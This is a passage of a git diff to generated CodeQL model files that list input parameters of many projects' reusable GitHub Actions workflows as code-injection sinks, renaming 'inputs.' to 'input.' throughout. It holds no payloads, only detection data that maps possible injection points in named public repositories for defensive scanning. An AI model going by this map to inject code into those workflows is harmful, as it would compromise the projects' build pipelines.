b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 1c3e5b565be..8ef924313a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] - - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 7e8d8061fc5..800c95ac1bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 21e3fdb8874..7a73bee6e57 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 67e49a5716c..08d64944bd9 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 2f30003359c..d1097c47aeb 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] - - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index ed9091f37ae..8d7fb64ad3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d940c6a98b0..d7790e533c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "input.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 57b56667fbe..093ed8bcfd1 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 4ffee539cd4..0ce99bc5fa9 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "input.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index bfe525b2c0e..2767dfbec76 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "input.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 647bd0ae193..2c5679329c1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b09fcb7f102..b3e26a1cf13 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index f83101f511c..963b64673a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index 7a60c93516d..fcf55466a9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 14d7e741dac..979bd414141 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index bb0e3a6a2b6..55d810d29b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index aa8f4e6b518..19350db868c 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index c9af1a40ddc..8d9af1a4e15 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 863bc645d98..47c09bf4f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 6e898a4e452..4ff0273b47a 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index a08a96a897e..ba53c900ce8 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", 